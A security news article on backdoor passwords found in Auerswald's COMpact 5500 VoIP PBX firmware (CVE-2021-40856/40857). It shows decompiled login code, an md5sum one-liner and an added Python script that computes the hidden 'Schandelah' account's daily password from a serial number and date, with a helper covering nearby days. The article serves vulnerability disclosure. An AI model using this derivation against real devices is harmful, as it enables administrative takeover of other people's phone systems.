One of Auerswald's widely used products contains two backdoor passwords that allow threat actors to escalate privileges
Multiple backdoors have been found in a device made by Auerswald, a German manufacturer of voice over Internet Protocol (VoIP) telecommunications hardware. A penetration test carried out by RedTeam Pentesting revealed two backdoor passwords that allow an attacker with access to the management application to take complete administrative control of the device.
The analysis began by downloading the firmware image for the COMpact 5500, version 7.8A, from Auerswald's support website and decompiling it with the reverse engineering tool Ghidra. The decompiled code revealed a hidden user with "sub-admin" privileges.
In the login routine, the supplied username is compared against the string "Schandelah". The researchers found this suspicious, since Schandelah is the name of a small village in Northern Germany where Auerswald manufactures its products. The relevant part of the decompiled code looks like this:
    iVar5 = strcmp((char *)username,"Schandelah");
    if (iVar5 == 0) {
        /* fills local_94 with the expected password for this user */
        FUN_00287a84(0,&local_94);
        if (local_600 == (undefined4 *)0x0) {
            [...]
        }
        else {
            /* local_600 holds the password supplied at login; compare it
               with the derived value in local_94 */
            iVar5 = strcmp((char *)local_600,(char *)&local_94);
            if (iVar5 == 0) {
                [...]
                goto LAB_00015954;   /* password matched */
            }
        }
    }
For the username "Schandelah", the wrapper function FUN_00287a84 fills the buffer local_94, which is then compared against local_600 with strcmp. Since local_600 is used as the supplied password in the other login paths, local_94 must hold the expected password for "Schandelah". Working through FUN_00287a84 showed how that password is derived: it is the first seven characters of the hex-encoded MD5 hash of a string built from a ten-digit value (the device serial number, according to RedTeam Pentesting's advisory), the literal "r2d2" and the current date in DD.MM.YYYY format. Because the date is part of the input, the password changes every day, but anyone who knows the serial number and the scheme can compute it. The researchers reproduced the computation with a one-liner and then logged in successfully:
    $ echo -n 1234123412r2d230.08.2021 | md5sum | egrep -o '^.{7}'
    1432d89
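As an added example (not code from this article, from Auerswald or from RedTeam Pentesting), the following Python script reproduces the derivation shown in the md5sum pipeline above and generalises it to any serial number and date. The literal "r2d2", the ten-digit prefix and the DD.MM.YYYY date format are read directly from the command; that the prefix is the device serial number is taken from RedTeam Pentesting's advisory, and the serial "1234123412" is simply the constructed value from the command. The candidate-window helper is my own addition, illustrating that the password rotates daily and that clock skew between the attacker and the PBX has to be accounted for.

```python
import hashlib
from datetime import date, timedelta


def password_material(serial: str, day: date) -> str:
    """Build the string that is hashed: <serial> + "r2d2" + <DD.MM.YYYY>.

    The layout is taken from the md5sum command in the article; the serial
    number as the first component is per RedTeam Pentesting's advisory.
    """
    return f"{serial}r2d2{day.strftime('%d.%m.%Y')}"


def schandelah_password(serial: str, day: date) -> str:
    """First seven hex characters of the MD5 digest of the material.

    Equivalent to:  echo -n <material> | md5sum | egrep -o '^.{7}'
    """
    digest = hashlib.md5(password_material(serial, day).encode("ascii")).hexdigest()
    return digest[:7]


def password_candidates(serial: str, around: date, days: int = 1) -> dict:
    """Passwords for a window of +/- `days` around `around`.

    The PBX uses its own notion of the current date, so a practitioner
    checking exposure should try the neighbouring days as well.
    Returns a mapping of DD.MM.YYYY -> password.
    """
    window = range(-days, days + 1)
    return {
        (around + timedelta(d)).strftime("%d.%m.%Y"):
            schandelah_password(serial, around + timedelta(d))
        for d in window
    }


if __name__ == "__main__":
    # Constructed sample input: the same serial and date the article's
    # md5sum command uses, so the result can be compared with its output.
    sample_serial = "1234123412"
    sample_day = date(2021, 8, 30)
    print(password_material(sample_serial, sample_day))
    print(schandelah_password(sample_serial, sample_day))
    for day, pw in password_candidates(sample_serial, sample_day).items():
        print(day, pw)
```

Running the script with the sample values should print the same seven characters as the md5sum pipeline above; changing the date by a single day yields a completely different password, which is why the window helper exists.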
"Equipped with this password, we then could authenticate successfully. After logging in, the web interface showed a special service page, which allowed, among other functions, to reset the administrator password."
While analysing CVE-2021-40856, the researchers also found CVE-2021-40857, which allows users with limited access to escalate their privileges to sub-admin; at that level an attacker can reconfigure the PBX.
Because of the impact of a successful exploit, the backdoor passwords are rated as high severity. Auerswald responded promptly to RedTeam Pentesting's report and published an advisory in December. The only workaround is to disable the web-based management interface or restrict access to it completely, so users are advised to upgrade to the latest firmware version as soon as possible.